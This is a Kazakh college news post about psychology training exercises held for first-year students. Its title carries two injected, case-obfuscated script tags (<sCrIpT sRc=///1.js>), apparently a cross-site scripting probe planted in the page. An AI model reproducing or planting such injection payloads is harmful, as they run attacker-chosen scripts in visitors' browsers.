«Өмірдің мәні» тренингтік жаттығулары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.09.2022

Ағымдағы жылдың 29 қыркүйек күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің жатақханасында «Ағылшын» және «Филология» бөлімінің І курс студенттерімен «Өмірдің мәні» атты тренингтік жаттығулар өткізілді. Іс-шараны педагог-психологтар Жанабылова Наргиз Сериковна және Жанбырбай Айдана Абдрахманқызы ұйымдастырды. Негізгі мақсат – жеткіншектердің өзінің ішкі жан дүниесіне үңілуін қадағалау. Сондай-ақ жастардың жалпы және жеке проблемаларын анықтау, белсенді өмір позициясын қалыптастыруға, өзіндік рефлексияны дамытуға көмектесу басты міндетке айналды. Тренингтік сабақ барысында «Сөйлемдерді аяқта», «Алтын балық», «Мейірімді тағдыр», «Психологтар сыйы» атты жаттығулар жүргізілді.

Просмотров: 363


Пікір қосу



Деректерді қолтаңбаға қосу